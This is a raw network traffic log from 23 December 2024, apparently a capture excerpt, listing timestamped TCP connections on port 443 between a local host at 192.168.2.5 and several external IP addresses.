                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.823180914 CET4434984594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.844609022 CET44349819162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.844685078 CET49819443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.848339081 CET44349820172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.848408937 CET49820443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.857479095 CET44349821172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.857919931 CET49821443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.857937098 CET44349821172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.858987093 CET44349821172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.859070063 CET49821443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.860424042 CET49821443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.860513926 CET44349821172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.860718012 CET49821443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.860724926 CET44349821172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.862027884 CET44349822172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.862226009 CET49822443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.862241983 CET44349822172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.862653971 CET44349828162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.862940073 CET49828443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.862951040 CET44349828162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.864069939 CET44349828162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.864129066 CET49828443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.865438938 CET44349835172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.865502119 CET49828443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.865623951 CET44349828162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.865724087 CET49835443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.865787983 CET44349835172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.865875006 CET49828443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.865890980 CET44349828162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.868036032 CET44349834172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.868256092 CET49834443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.868271112 CET44349834172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.868467093 CET44349829162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.868675947 CET49829443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.868689060 CET44349829162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.869286060 CET44349834172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.869340897 CET49834443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.869759083 CET44349829162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.869812012 CET49829443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.870223999 CET49829443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.870270967 CET44349835172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.870287895 CET44349829162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.870332956 CET49835443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.870420933 CET49834443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.870470047 CET44349834172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.870747089 CET49835443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.870822906 CET44349835172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.870899916 CET44349822172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.870917082 CET49829443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.870925903 CET44349829162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.870954990 CET49822443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.870989084 CET49834443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.870995998 CET44349834172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.871054888 CET49835443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.871068954 CET44349835172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.871396065 CET49822443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.871438026 CET49822443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.871522903 CET44349822172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.927122116 CET49821443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.927145958 CET49835443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.927149057 CET49829443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.975194931 CET49851443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.975231886 CET44349851162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.975296974 CET49851443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.975533009 CET49851443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.975548029 CET44349851162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.988804102 CET49822443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.988807917 CET49834443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.988821030 CET44349822172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.988867998 CET49828443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.051323891 CET49852443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.051356077 CET44349852172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.051430941 CET49852443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.051640987 CET49852443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.051651955 CET44349852172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.117578030 CET49853443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.117635012 CET44349853172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.117708921 CET49853443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.117896080 CET49853443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.117909908 CET44349853172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.177520990 CET49822443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.292373896 CET44349821172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.292551041 CET44349821172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.292862892 CET49821443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.292862892 CET49821443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.296989918 CET44349828162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.297059059 CET44349828162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.297192097 CET44349822172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.297389984 CET44349822172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.297435045 CET49828443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.297492027 CET49822443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.297523975 CET49828443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.297534943 CET44349828162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.297980070 CET49822443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.297991037 CET44349822172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.299233913 CET44349835172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.299398899 CET44349835172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.299567938 CET49835443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.299568892 CET49835443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.303123951 CET44349829162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.303343058 CET44349829162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.303623915 CET49829443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.303716898 CET49829443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.303725958 CET44349829162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.306092024 CET44349834172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.306164026 CET44349834172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.306344986 CET49834443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.306413889 CET49834443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.306430101 CET44349834172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.536524057 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.536901951 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.536917925 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.537328959 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.537342072 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.537417889 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.537426949 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.537909985 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.538105965 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.539500952 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.539500952 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.539518118 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.539598942 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.542900085 CET4434984118.165.220.110192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.543205976 CET49841443192.168.2.518.165.220.110
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.543231964 CET4434984118.165.220.110192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.544473886 CET4434984118.165.220.110192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.544584036 CET49841443192.168.2.518.165.220.110
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.545646906 CET49841443192.168.2.518.165.220.110
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.545722008 CET4434984118.165.220.110192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.585361958 CET49841443192.168.2.518.165.220.110
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.585366011 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.585380077 CET4434984118.165.220.110192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.585397005 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.600531101 CET49821443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.600557089 CET44349821172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.600588083 CET49835443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.600627899 CET44349835172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.631283998 CET49841443192.168.2.518.165.220.110
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.631397009 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.837362051 CET49854443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.837403059 CET44349854162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.837665081 CET49854443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.837909937 CET49854443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.837920904 CET44349854162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.837939024 CET49855443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.837981939 CET44349855162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.838222980 CET49855443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.838222980 CET49855443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.838265896 CET44349855162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.100861073 CET4434980794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.100930929 CET4434980794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.101087093 CET49807443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.105077028 CET49807443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.105094910 CET4434980794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.189582109 CET44349851162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.195034981 CET49851443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.195054054 CET44349851162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.195528030 CET44349851162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.196507931 CET49851443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.196584940 CET44349851162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.196789026 CET49851443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.206865072 CET49856443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.206918955 CET44349856172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.207082033 CET49856443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.207351923 CET49857443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.207386971 CET44349857172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.207848072 CET49856443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.207870960 CET44349856172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.207909107 CET49857443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.208344936 CET49857443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.208364964 CET44349857172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.218178034 CET4434984594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.220995903 CET49845443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.222606897 CET49845443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.222621918 CET4434984594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.224315882 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226187944 CET49845443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226187944 CET49845443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226212978 CET4434984594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226229906 CET4434984594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226407051 CET49845443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226421118 CET4434984594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226465940 CET49845443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226475954 CET4434984594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226500988 CET49845443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226512909 CET4434984594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226552963 CET49845443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226552963 CET49845443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226571083 CET4434984594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226579905 CET4434984594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226885080 CET49845443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226902008 CET4434984594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.228557110 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.229198933 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.229208946 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.239340067 CET44349851162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.239896059 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.241070986 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.241076946 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.249512911 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.249567032 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.249572039 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.260164022 CET44349852172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.261264086 CET49852443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.261286020 CET44349852172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.261692047 CET44349852172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.262511015 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.262932062 CET49852443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.262932062 CET49852443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.263025999 CET44349852172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.263053894 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.263058901 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.276263952 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.277103901 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.277117014 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.289999962 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.290082932 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.290087938 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.318022966 CET49852443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.333674908 CET44349853172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.334062099 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.334177971 CET49853443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.334212065 CET44349853172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.334523916 CET44349853172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.334824085 CET49853443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.334884882 CET44349853172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.335197926 CET49853443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.343785048 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.348117113 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.349111080 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.349118948 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.379336119 CET44349853172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.396138906 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.396150112 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.419691086 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.419754028 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.419759035 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.428143024 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.428234100 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.428244114 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.436306953 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.437118053 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.437124968 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.449852943 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.449919939 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.449925900 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.463363886 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.463430882 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.463435888 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.475693941 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.475765944 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.475775003 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.489408016 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.489459991 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.489464998 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.503161907 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.503227949 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.503232956 CET44349823142.250.181.65192.168.2.5
